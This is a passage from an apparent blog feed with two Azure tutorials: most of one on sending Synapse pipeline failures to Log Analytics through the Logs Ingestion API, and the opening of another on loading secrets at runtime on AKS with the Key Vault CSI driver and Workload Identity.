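&lt;P&gt;For readers who prefer to see the shape of such a rule, the Python sketch below assembles a DCR properties body with one stream declaration, one Log Analytics destination, and one data flow. Treat it as an approximation under stated assumptions: the &lt;CODE&gt;build_dcr_properties&lt;/CODE&gt; helper, the destination name &lt;CODE&gt;failureLogs&lt;/CODE&gt;, the resource ID, and the two sample columns are hypothetical, and the property names should be checked against the current DCR reference before use.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import json

TABLE = "DataDomain_SynapsePipelineErrors_CL"
STREAM = "Custom-" + TABLE  # assumption: custom stream names carry a Custom- prefix

def build_dcr_properties(workspace_resource_id, columns):
    """Assemble a DCR properties body that routes one custom stream to one table."""
    return {
        "streamDeclarations": {
            STREAM: {"columns": [{"name": n, "type": t} for n, t in columns]}
        },
        "destinations": {
            "logAnalytics": [
                {"workspaceResourceId": workspace_resource_id, "name": "failureLogs"}
            ]
        },
        "dataFlows": [
            {
                "streams": [STREAM],
                "destinations": ["failureLogs"],
                "transformKql": "source",  # pass-through; edit to rename or cast fields
                "outputStream": STREAM,
            }
        ],
    }

# Hypothetical workspace ID and a shortened column list.
props = build_dcr_properties(
    "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-example"
    "/providers/Microsoft.OperationalInsights/workspaces/log-analytics-data-domain",
    [("TimeGenerated", "datetime"), ("PipelineName", "string")],
)
print(json.dumps(props, indent=2))&lt;/LI-CODE&gt;
&lt;P&gt;The &lt;CODE&gt;transformKql&lt;/CODE&gt; entry is where a schema change can be absorbed without touching the pipelines, which is the decoupling described above.&lt;/P&gt;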
&lt;H2 data-section-id="ztgt00" data-start="2602" data-end="2645"&gt;4. Configure the Logs Ingestion endpoint&lt;/H2&gt;
&lt;P data-start="2647" data-end="2746"&gt;Once the DCR is created, Azure generates an ingestion endpoint that will be used by your pipelines.&lt;/P&gt;
&lt;P data-start="2748" data-end="2782"&gt;The endpoint follows this pattern:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;https://&amp;lt;dce&amp;gt;.&amp;lt;region&amp;gt;.ingest.monitor.azure.com/dataCollectionRules/&amp;lt;dcrId&amp;gt;/streams/&amp;lt;streamName&amp;gt;?api-version=2023-01-01&lt;/LI-CODE&gt;
&lt;P data-start="2913" data-end="2988"&gt;This endpoint is what your Synapse pipeline will call using a Web Activity.&lt;/P&gt;
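&lt;P&gt;The pattern above is easy to get subtly wrong when assembled by hand, so here is a small Python sketch that builds the URL from its three parts. The &lt;CODE&gt;build_ingestion_url&lt;/CODE&gt; helper and every value passed to it are hypothetical placeholders; substitute the endpoint, rule ID, and stream name from your own DCR.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from urllib.parse import quote

API_VERSION = "2023-01-01"  # version used in the pattern above

def build_ingestion_url(dce_base_url, dcr_id, stream_name):
    """Join the endpoint, rule ID, and stream name into the ingestion URL."""
    base = dce_base_url.rstrip("/")
    return (
        f"{base}/dataCollectionRules/{quote(dcr_id, safe='')}"
        f"/streams/{quote(stream_name, safe='')}?api-version={API_VERSION}"
    )

# Hypothetical values for illustration only.
print(build_ingestion_url(
    "https://example-dce.westeurope.ingest.monitor.azure.com",
    "dcr-00000000000000000000000000000000",
    "Custom-DataDomain_SynapsePipelineErrors_CL",
))&lt;/LI-CODE&gt;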
&lt;P data-start="2990" data-end="3021"&gt;At this point, you should also:&lt;/P&gt;
&lt;UL data-start="3022" data-end="3133"&gt;
&lt;LI data-section-id="1608d2y" data-start="3022" data-end="3066"&gt;Enable &lt;STRONG data-start="3031" data-end="3066"&gt;Managed Identity authentication&lt;/STRONG&gt;&lt;/LI&gt;
&lt;LI data-section-id="h3599u" data-start="3067" data-end="3133"&gt;Grant the Synapse workspace permission to send data to the DCR&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="3135" data-end="3187"&gt;This ensures secure ingestion without using secrets.&lt;/P&gt;
&lt;H2 data-section-id="il8nuu" data-start="3194" data-end="3218"&gt;5. RBAC for Managed Identity&lt;/H2&gt;
&lt;P&gt;The Managed Identity used by Synapse or Microsoft Fabric must have the following Azure RBAC role:&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Monitoring Metrics Publisher&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;This role allows the identity to send data through the Azure Monitor Logs Ingestion API.&lt;/P&gt;
&lt;P&gt;The role should be assigned on the &lt;STRONG&gt;Data Collection Rule (DCR)&lt;/STRONG&gt; resource.&lt;/P&gt;
&lt;P&gt;In Azure Portal:&lt;/P&gt;
&lt;P&gt;Data Collection Rule (DCR) → Access Control (IAM) → Add Role Assignment → Monitoring Metrics Publisher → Select Synapse/Fabric Managed Identity&lt;/P&gt;
&lt;P&gt;Without this role assignment, requests to the Logs Ingestion API will fail with authorization errors such as HTTP 403.&lt;/P&gt;
&lt;H2 data-section-id="il8nuu" data-start="3194" data-end="3218"&gt;6. Validate the setup&lt;/H2&gt;
&lt;P data-start="3220" data-end="3305"&gt;Before integrating with pipelines, it’s a good idea to validate that ingestion works.&lt;/P&gt;
&lt;P data-start="3307" data-end="3411"&gt;You can send a test payload (via Postman or a simple script) and then query your table in Log Analytics:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;DataDomain_SynapsePipelineErrors_CL | take 10&lt;/LI-CODE&gt;
&lt;P data-start="3475" data-end="3554"&gt;If everything is configured correctly, you should see your test records appear.&lt;/P&gt;
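&lt;P&gt;For the "simple script" option, a minimal Python sketch using only the standard library might look like the following. It builds the POST request without sending it, so it can be inspected first. The &lt;CODE&gt;build_test_request&lt;/CODE&gt; helper, the placeholder URL, and the record values are hypothetical, and the bearer token is assumed to have been obtained separately for the https://monitor.azure.com resource.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import json
import urllib.request
from datetime import datetime, timezone

def build_test_request(ingestion_url, bearer_token):
    """Build (but do not send) a POST with a one-record JSON array body."""
    record = {
        "TimeGenerated": datetime.now(timezone.utc).isoformat(),
        "PipelineName": "POC_Test",
        "Status": "Failed",
        "ErrorMessage": "Manual ingestion test",
    }
    body = json.dumps([record]).encode("utf-8")  # records are sent as a JSON array
    return urllib.request.Request(
        ingestion_url,
        data=body,
        method="POST",
        headers={
            "Content-Type": "application/json",
            "Authorization": f"Bearer {bearer_token}",
        },
    )

# Hypothetical placeholders; nothing is sent until urlopen is called.
request = build_test_request(
    "https://example.invalid/dataCollectionRules/dcr-id/streams/stream-name?api-version=2023-01-01",
    "TOKEN",
)
print(request.get_method(), request.full_url)
# To send for real: urllib.request.urlopen(request)&lt;/LI-CODE&gt;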
&lt;P data-start="3475" data-end="3554"&gt;&amp;nbsp;&lt;/P&gt;
&lt;P data-start="3475" data-end="3554"&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1 data-start="1481" data-end="1757"&gt;&lt;STRONG&gt;Integrating with Synapse pipelines&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;Now that the ingestion layer is ready, the next step is connecting Synapse pipelines so that failures are logged automatically instead of through manual test payloads.&lt;BR /&gt;The idea is simple:&lt;BR /&gt;whenever a pipeline activity fails, we capture the failure details, transform them into a structured payload, and send them directly to the Logs Ingestion API. This turns pipeline failures into centralized operational events.&lt;/P&gt;
&lt;H3&gt;1. Add a failure handling path&lt;/H3&gt;
&lt;P&gt;Inside your Synapse pipeline, add an &lt;STRONG&gt;On Failure&lt;/STRONG&gt; dependency from the activities you want to monitor.&lt;/P&gt;
&lt;P&gt;Typically, this includes &lt;STRONG&gt;critical &lt;/STRONG&gt;activities such as:&lt;/P&gt;
&lt;UL data-spread="false"&gt;
&lt;LI&gt;Copy Activities&lt;/LI&gt;
&lt;LI&gt;Notebook executions&lt;/LI&gt;
&lt;LI&gt;Stored Procedures&lt;/LI&gt;
&lt;LI&gt;Data Flows&lt;/LI&gt;
&lt;LI&gt;Web Activities&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Instead of allowing the pipeline to fail silently, the failure path redirects execution into a dedicated logging step. In most production environments, this is implemented as a reusable child pipeline such as:&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Pipeline name: Customized Logs API&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;This keeps logging logic centralized and avoids duplicating the same implementation across dozens of pipelines.&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H3&gt;2. Pass failure metadata as parameters&lt;/H3&gt;
&lt;P&gt;The logging pipeline should receive operational context from the parent pipeline.&lt;/P&gt;
&lt;P&gt;Typical parameters include:&lt;/P&gt;
&lt;UL data-spread="false"&gt;
&lt;LI&gt;Pipeline name&lt;/LI&gt;
&lt;LI&gt;Pipeline run ID&lt;/LI&gt;
&lt;LI&gt;Activity name&lt;/LI&gt;
&lt;LI&gt;Activity type&lt;/LI&gt;
&lt;LI&gt;Error code&lt;/LI&gt;
&lt;LI&gt;Error message&lt;/LI&gt;
&lt;LI&gt;Environment&lt;/LI&gt;
&lt;LI&gt;Layer (Bronze/Silver/Gold)&lt;/LI&gt;
&lt;LI&gt;Dataset name&lt;/LI&gt;
&lt;LI&gt;Severity&lt;/LI&gt;
&lt;LI&gt;Correlation ID&lt;/LI&gt;
&lt;/UL&gt;
&lt;img /&gt;
&lt;P&gt;This metadata becomes the foundation of the structured logging payload.&lt;/P&gt;
&lt;P&gt;The more operational context you capture here, the easier troubleshooting becomes later.&lt;/P&gt;
&lt;H3&gt;3. Construct the logging payload&lt;/H3&gt;
&lt;P&gt;Inside the logging pipeline (&lt;STRONG&gt;Customized Logs API&lt;/STRONG&gt;), use a dynamic content expression to construct a JSON payload matching the Log Analytics schema.&lt;/P&gt;
&lt;P&gt;Example payload:&lt;/P&gt;
&lt;LI-CODE lang="json"&gt;@concat( '[{"TimeGenerated":"', utcNow(), '","PipelineName":"POC_Test"', ',"PipelineRunId":"', pipeline().RunId, '","PipelineStatus":"Failed"', ',"ActivityName":"TestActivity"', ',"ActivityType":"Web"', ',"ActivityStatus":"Failed"', ',"ErrorCode":"TEST"', ',"ErrorMessage":"POC test"', ',"Severity":"Warning"', ',"Environment":"Test"', ',"Layer":"Bronze"', ',"ExecutionStage":"POC"', ',"DatasetName":"TestDataset"', ',"PartitionDate":"', utcNow(), '","WorkspaceName":"', pipeline().DataFactory, '","TriggerName":"Manual"', ',"TriggerTimeUtc":"', utcNow(), '","DurationMs":1000', ',"RetryCount":0', ',"Compute":"Synapse"', ',"CorrelationId":"', pipeline().RunId, '","Payload":{"source":"test","target":"loganalytics"}}]' )&lt;/LI-CODE&gt;
&lt;P&gt;The important part is schema consistency.&lt;/P&gt;
&lt;P&gt;Every pipeline should emit the same payload structure regardless of which activity failed.&lt;/P&gt;
&lt;P&gt;This makes downstream querying and dashboarding significantly easier.&lt;/P&gt;
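&lt;P&gt;As a rough illustration of that consistency rule, the Python sketch below rejects any record that lacks one of the shared fields. The field names come from the example payload above; the helper name build_failure_record and the choice of which fields count as required are assumptions made for this sketch, not part of the Synapse setup.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import json
from datetime import datetime, timezone

# Field names mirror the example payload; treating them as required is an assumption.
REQUIRED_FIELDS = (
    "TimeGenerated", "PipelineName", "PipelineRunId", "PipelineStatus",
    "ActivityName", "ActivityType", "ActivityStatus", "ErrorCode",
    "ErrorMessage", "Severity", "Environment", "Layer", "DatasetName",
    "CorrelationId",
)


def build_failure_record(**fields):
    """Return a one-element list (matching the array payload) or raise ValueError."""
    record = {"TimeGenerated": datetime.now(timezone.utc).isoformat()}
    record.update(fields)
    missing = [name for name in REQUIRED_FIELDS if name not in record]
    if missing:
        raise ValueError("missing fields: " + ", ".join(missing))
    return [record]


if __name__ == "__main__":
    payload = build_failure_record(
        PipelineName="POC_Test", PipelineRunId="run-1", PipelineStatus="Failed",
        ActivityName="TestActivity", ActivityType="Web", ActivityStatus="Failed",
        ErrorCode="TEST", ErrorMessage="POC test", Severity="Warning",
        Environment="Test", Layer="Bronze", DatasetName="TestDataset",
        CorrelationId="run-1",
    )
    print(json.dumps(payload, indent=2))&lt;/LI-CODE&gt;
&lt;P&gt;Failing fast on a missing field is one possible design choice; a pipeline could equally fill missing values with a placeholder so that a logging problem never hides the original failure.&lt;/P&gt;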
&lt;H3&gt;4. Send logs using a Web Activity&lt;/H3&gt;
&lt;P&gt;After constructing the payload, use a Web Activity to send the data to the Logs Ingestion API endpoint configured earlier.&lt;/P&gt;
&lt;P&gt;Typical configuration:&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;URL&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang=""&gt;https://&amp;lt;data-collection-endpoint&amp;gt;.&amp;lt;region&amp;gt;.ingest.monitor.azure.com/dataCollectionRules/&amp;lt;dcr-id&amp;gt;/streams/&amp;lt;stream-name&amp;gt;?api-version=2023-01-01&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Method&lt;/STRONG&gt;&lt;BR /&gt;POST&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Authentication&lt;/STRONG&gt;&lt;BR /&gt;Managed Identity&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Resource&lt;/STRONG&gt;&lt;BR /&gt;https://monitor.azure.com&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Headers&lt;/STRONG&gt;&lt;/P&gt;
&lt;P data-start="3475" data-end="3554"&gt;{ "Content-Type": "application/json" }&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Body&lt;/STRONG&gt;&lt;BR /&gt;Dynamic JSON payload generated in the previous step.&lt;/P&gt;
&lt;P&gt;I highly recommend using Managed Identity: it avoids storing secrets or credentials inside Synapse pipelines and keeps authentication fully managed by Azure.&lt;/P&gt;
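&lt;P&gt;For testing the endpoint outside Synapse, the same request can be assembled by hand. The sketch below is a minimal illustration that only builds the request and does not send it. The function name build_ingestion_request and its parameters are hypothetical, and obtaining a bearer token for the https://monitor.azure.com resource is assumed to happen elsewhere (in Synapse, the Web Activity does this through Managed Identity).&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import json
import urllib.request


def build_ingestion_request(endpoint, dcr_id, stream_name, bearer_token, records):
    """Build (but do not send) the POST request described in the configuration above."""
    url = (
        f"{endpoint.rstrip('/')}/dataCollectionRules/{dcr_id}"
        f"/streams/{stream_name}?api-version=2023-01-01"
    )
    return urllib.request.Request(
        url,
        data=json.dumps(records).encode("utf-8"),
        method="POST",
        headers={
            "Content-Type": "application/json",
            # Assumption: the caller already holds a token for https://monitor.azure.com
            "Authorization": f"Bearer {bearer_token}",
        },
    )


if __name__ == "__main__":
    # Placeholder values only; none of these identify a real resource.
    request = build_ingestion_request(
        "https://example-endpoint.region.ingest.monitor.azure.com",
        "dcr-placeholder",
        "Custom-Placeholder_CL",
        "token-placeholder",
        [{"PipelineName": "POC_Test", "PipelineStatus": "Failed"}],
    )
    print(request.get_method(), request.full_url)&lt;/LI-CODE&gt;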
&lt;H3&gt;5. Validate end-to-end ingestion&lt;/H3&gt;
&lt;P&gt;Once the pipeline is connected, trigger a controlled failure and verify that the event appears in Log Analytics.&lt;/P&gt;
&lt;P&gt;Run:&lt;/P&gt;
&lt;P data-start="3475" data-end="3554"&gt;DataDomain_SynapsePipelineErrors_CL | sort by TimeGenerated desc | take 20&lt;/P&gt;
&lt;P data-start="3475" data-end="3554"&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;You should now see real pipeline failures arriving automatically from Synapse.&lt;/P&gt;
&lt;P&gt;At this point, the framework becomes fully operational.&lt;/P&gt;
&lt;P&gt;Failures are no longer isolated runtime events buried inside activity outputs; they are centralized, queryable operational records that can be analyzed across the entire platform.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1 data-start="1481" data-end="1757"&gt;&lt;STRONG&gt;Future Steps&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;Now that we have a centralized logging framework in place, we can take observability one step further by building operational dashboards in Power BI or Microsoft Fabric to analyze reliability trends across the entire data platform. Instead of reacting to isolated pipeline failures, we can aggregate logs across pipelines, datasets, environments, and medallion layers to identify what is actually causing instability over time. This allows engineering teams to detect recurring error patterns, identify unstable datasets, measure platform reliability, analyze failure spikes after deployments, and understand where operational bottlenecks are concentrated. By transforming pipeline failures into structured operational telemetry, the framework evolves beyond simple logging into an observability platform that supports proactive reliability engineering. Teams can then move from reactive firefighting to data-driven operational improvements based on measurable reliability KPIs such as failure trends, MTTR, SLA compliance, severity distribution, and pipeline health scoring.&lt;/P&gt;
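&lt;P&gt;To make the aggregation idea concrete, here is a small Python sketch that counts failure records by any combination of fields, such as medallion layer and severity. It assumes the records have already been exported from Log Analytics as dictionaries using the field names from the logging payload; the function name failures_by and the sample records are hypothetical.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from collections import Counter


def failures_by(records, *keys):
    """Count failure records grouped by the given field names."""
    return Counter(tuple(r.get(k, "unknown") for k in keys) for r in records)


if __name__ == "__main__":
    # Hypothetical sample records, not real telemetry.
    sample = [
        {"Layer": "Bronze", "Severity": "Warning", "DatasetName": "TestDataset"},
        {"Layer": "Bronze", "Severity": "Warning", "DatasetName": "TestDataset"},
        {"Layer": "Gold", "Severity": "Critical", "DatasetName": "OtherDataset"},
    ]
    for group, count in failures_by(sample, "Layer", "Severity").most_common():
        print(group, count)&lt;/LI-CODE&gt;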
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1 data-start="1481" data-end="1757"&gt;&lt;STRONG&gt;Links&lt;/STRONG&gt;&lt;/H1&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/logs/tutorial-logs-ingestion-portal" target="_blank" rel="noopener"&gt;Tutorial: Send data to Azure Monitor Logs with Logs ingestion API (Azure portal) - Azure Monitor | Microsoft Learn&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://medium.com/@satyamgawade/medallion-architecture-understanding-with-azure-synapse-analytics-example-7c48cc2d3478" target="_blank" rel="noopener"&gt;Medallion Architecture Understanding with Azure Synapse Analytics Example | by Satyam Gawade | Medium&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Feedback: &lt;A href="https://www.linkedin.com/in/sally-dabbah/" target="_blank" rel="noopener"&gt;Sally Dabbah | LinkedIn&lt;/A&gt;&amp;nbsp;&lt;/LI&gt;
&lt;/OL&gt;</description>
      <pubDate>Mon, 08 Jun 2026 10:31:33 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/analytics-on-azure-blog/designing-reliable-data-platforms-centralized-failure-logging/ba-p/4505832</guid>
      <dc:creator>Sally_Dabbah</dc:creator>
      <dc:date>2026-06-08T10:31:33Z</dc:date>
    </item>
    <item>
      <title>Getting Secrets Out of YAML: Implementing Azure Key Vault CSI Driver on AKS with Workload Identity</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-developer-community/getting-secrets-out-of-yaml-implementing-azure-key-vault-csi/ba-p/4522590</link>
      <description>&lt;H2&gt;Table of Contents&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;Why This Pattern Matters&lt;/LI&gt;
&lt;LI&gt;The Problem with Secrets in YAML&lt;/LI&gt;
&lt;LI&gt;What We Wanted to Achieve&lt;/LI&gt;
&lt;LI&gt;Architecture Overview&lt;/LI&gt;
&lt;LI&gt;How the Flow Works&lt;/LI&gt;
&lt;LI&gt;Implementation Prerequisites&lt;/LI&gt;
&lt;LI&gt;Step-by-Step Implementation&lt;/LI&gt;
&lt;LI&gt;Understanding the YAML Components&lt;/LI&gt;
&lt;LI&gt;Secret Rotation and Reloaders&lt;/LI&gt;
&lt;LI&gt;Common Pitfalls and Troubleshooting&lt;/LI&gt;
&lt;LI&gt;Security and Operational Benefits&lt;/LI&gt;
&lt;LI&gt;Key Takeaways&lt;/LI&gt;
&lt;LI&gt;Microsoft Documentation References&lt;/LI&gt;
&lt;LI&gt;Final Thoughts&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Why This Pattern Matters&lt;/H2&gt;
&lt;P&gt;Most Kubernetes environments start with good intentions around secret management.&lt;/P&gt;
&lt;P&gt;Over time, however, many AKS deployments gradually evolve toward patterns like:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;value: "#{SomeSecret}#"&lt;/LI-CODE&gt;
&lt;P&gt;A pipeline substitutes the value during deployment, the application works, and the pattern spreads across services.&lt;/P&gt;
&lt;P&gt;The problem is that this quietly turns:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;deployment pipelines&lt;/LI&gt;
&lt;LI&gt;rendered manifests&lt;/LI&gt;
&lt;LI&gt;release artifacts&lt;/LI&gt;
&lt;LI&gt;CI/CD logs&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;into part of the secret distribution path.&lt;/P&gt;
&lt;P&gt;Even if the secret originates from Azure Key Vault, the value itself still travels through multiple systems before reaching the pod.&lt;/P&gt;
&lt;P&gt;That creates:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;unnecessary exposure risk&lt;/LI&gt;
&lt;LI&gt;difficult rotation workflows&lt;/LI&gt;
&lt;LI&gt;broader operational blast radius&lt;/LI&gt;
&lt;LI&gt;audit complexity&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This article walks through a cleaner runtime-based model using:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Azure Key Vault CSI Driver&lt;/LI&gt;
&lt;LI&gt;AKS Workload Identity&lt;/LI&gt;
&lt;LI&gt;Managed Identity federation&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;where workloads authenticate directly to Key Vault without secret values ever appearing in YAML or pipelines.&lt;/P&gt;
&lt;H2&gt;The Problem with Secrets in YAML&lt;/H2&gt;
&lt;P&gt;The traditional pattern usually looks like this:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;env: - name: APPLICATION_SECRET value: "#{ApplicationSecret}#"&lt;/LI-CODE&gt;
&lt;P&gt;At deployment time:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;The pipeline retrieves the secret&lt;/LI&gt;
&lt;LI&gt;The placeholder is replaced&lt;/LI&gt;
&lt;LI&gt;Kubernetes receives the rendered manifest&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;Operationally, this means:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;the pipeline temporarily possesses the secret&lt;/LI&gt;
&lt;LI&gt;the rendered YAML contains the secret&lt;/LI&gt;
&lt;LI&gt;logs or artifacts may accidentally retain it&lt;/LI&gt;
&lt;LI&gt;secret rotation requires redeployment&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This often exists because:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Key Vault secret names don't match application configuration names&lt;/LI&gt;
&lt;LI&gt;teams want backward compatibility&lt;/LI&gt;
&lt;LI&gt;changing application code is expensive&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The Azure Key Vault CSI Driver solves this by introducing a runtime mapping layer instead of a pipeline substitution layer.&lt;/P&gt;
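&lt;P&gt;When planning a migration away from this pattern, it can help to find out where substitution tokens still live. The Python sketch below is one possible way to list them; it assumes placeholders always use the #{Name}# form shown above, and the function name find_placeholders is hypothetical.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import re

# Matches tokens of the form #{Name}# and captures the name.
PLACEHOLDER = re.compile(r"#\{([^}]+)\}#")


def find_placeholders(manifest_text):
    """Return the token names still awaiting pipeline substitution."""
    return PLACEHOLDER.findall(manifest_text)


if __name__ == "__main__":
    manifest = 'env:\n- name: APPLICATION_SECRET\n  value: "#{ApplicationSecret}#"\n'
    print(find_placeholders(manifest))&lt;/LI-CODE&gt;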
&lt;H2&gt;What We Wanted to Achieve&lt;/H2&gt;
&lt;P&gt;The design goals were simple:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;No secret values in YAML&lt;/LI&gt;
&lt;LI&gt;No secret substitution in CI/CD pipelines&lt;/LI&gt;
&lt;LI&gt;Runtime-only secret retrieval&lt;/LI&gt;
&lt;LI&gt;Identity-based authentication&lt;/LI&gt;
&lt;LI&gt;Support for mapping Key Vault names to application config names&lt;/LI&gt;
&lt;LI&gt;Minimal or zero application code changes&lt;/LI&gt;
&lt;LI&gt;Secure secret rotation workflows&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Architecture Overview&lt;/H2&gt;
&lt;LI-CODE lang="mermaid"&gt;+----------------------+
|   AKS Application    |
|        Pod           |
+----------+-----------+
           |
           v
+----------------------+
| Kubernetes           |
| ServiceAccount       |
+----------+-----------+
           |
           v
+----------------------+
| AKS Workload         |
| Identity Webhook     |
+----------+-----------+
           |
           v
+----------------------+
| Federated Managed    |
| Identity             |
+----------+-----------+
           |
           v
+----------------------+
| Azure Key Vault      |
+----------+-----------+
           |
           v
+----------------------+
| CSI Driver Mount     |
| (/mnt/secrets-store) |
+----------+-----------+
           |
           v
+----------------------+
| Application Reads    |
| Secret at Runtime    |
+----------------------+
&lt;/LI-CODE&gt;
&lt;H2&gt;How the Flow Works&lt;/H2&gt;
&lt;P&gt;When a pod starts:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;The pod uses a Kubernetes ServiceAccount&lt;/LI&gt;
&lt;LI&gt;AKS Workload Identity injects an OIDC token&lt;/LI&gt;
&lt;LI&gt;The Secrets Store CSI Driver uses that token&lt;/LI&gt;
&lt;LI&gt;Azure validates the federated identity relationship&lt;/LI&gt;
&lt;LI&gt;The Managed Identity receives access to Key Vault&lt;/LI&gt;
&lt;LI&gt;Secrets are retrieved at runtime&lt;/LI&gt;
&lt;LI&gt;Secrets become available to the container as files under the CSI mount path&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;This entire process happens dynamically during pod startup.&lt;/P&gt;
&lt;P&gt;No secret values pass through:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;YAML manifests&lt;/LI&gt;
&lt;LI&gt;pipeline variables&lt;/LI&gt;
&lt;LI&gt;Helm values&lt;/LI&gt;
&lt;LI&gt;release artifacts&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The pod authenticates as itself.&lt;/P&gt;
&lt;H2&gt;Implementation Prerequisites&lt;/H2&gt;
&lt;P&gt;Before implementation, ensure:&lt;/P&gt;
&lt;P&gt;Requirement - Purpose&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;AKS Cluster - Runtime environment&lt;/LI&gt;
&lt;LI&gt;Azure Key Vault - Centralized secret store&lt;/LI&gt;
&lt;LI&gt;OIDC Enabled - Required for federation&lt;/LI&gt;
&lt;LI&gt;Workload Identity Enabled - Enables identity injection&lt;/LI&gt;
&lt;LI&gt;Managed Identity - Authentication mechanism&lt;/LI&gt;
&lt;LI&gt;Secrets Store CSI Driver - Runtime secret retrieval&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Implementation&lt;/H2&gt;
&lt;P&gt;The implementation can generally be divided into two phases:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Platform Setup&lt;/STRONG&gt; - One-time AKS and Azure configuration performed by platform/infrastructure teams&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Application Onboarding&lt;/STRONG&gt; - Per-service configuration performed by application teams&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This separation is important because most of the complexity exists only once at the platform layer. After the foundational setup is complete, onboarding additional workloads becomes significantly simpler and more repeatable.&lt;/P&gt;
&lt;P&gt;The examples below are intended to demonstrate the overall implementation pattern and architecture flow. Exact implementation details may vary depending on:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;organizational RBAC models&lt;/LI&gt;
&lt;LI&gt;networking restrictions&lt;/LI&gt;
&lt;LI&gt;Key Vault access configuration&lt;/LI&gt;
&lt;LI&gt;GitOps/Helm workflows&lt;/LI&gt;
&lt;LI&gt;cluster governance policies&lt;/LI&gt;
&lt;LI&gt;AKS versions and add-on configurations&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Phase 1 — Platform Setup&lt;/H2&gt;
&lt;H2&gt;1. Enable Required AKS Capabilities&lt;/H2&gt;
&lt;P&gt;A typical implementation starts by enabling the AKS capabilities required for identity federation and runtime secret retrieval.&lt;/P&gt;
&lt;P&gt;These usually include:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;OIDC Issuer - Enables identity federation between AKS and Microsoft Entra ID&lt;/LI&gt;
&lt;LI&gt;Workload Identity - Injects federated identity tokens into workloads&lt;/LI&gt;
&lt;LI&gt;Azure Key Vault CSI Driver - Retrieves secrets securely at runtime&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Example Azure CLI commands:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az aks update \
  --resource-group &amp;lt;resource-group&amp;gt; \
  --name &amp;lt;aks-cluster&amp;gt; \
  --enable-oidc-issuer \
  --enable-workload-identity&lt;/LI-CODE&gt;&lt;LI-CODE lang="bash"&gt;az aks enable-addons \
  --addons azure-keyvault-secrets-provider \
  --resource-group &amp;lt;resource-group&amp;gt; \
  --name &amp;lt;aks-cluster&amp;gt;&lt;/LI-CODE&gt;
&lt;P&gt;Most organizations validate these capabilities before onboarding workloads.&lt;/P&gt;
&lt;H2&gt;2. Configure a Managed Identity&lt;/H2&gt;
&lt;P&gt;Each workload or application typically receives its own User-Assigned Managed Identity.&lt;/P&gt;
&lt;P&gt;This follows least-privilege principles and helps reduce operational blast radius between services.&lt;/P&gt;
&lt;P&gt;Example:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az identity create \
  --name workload-identity \
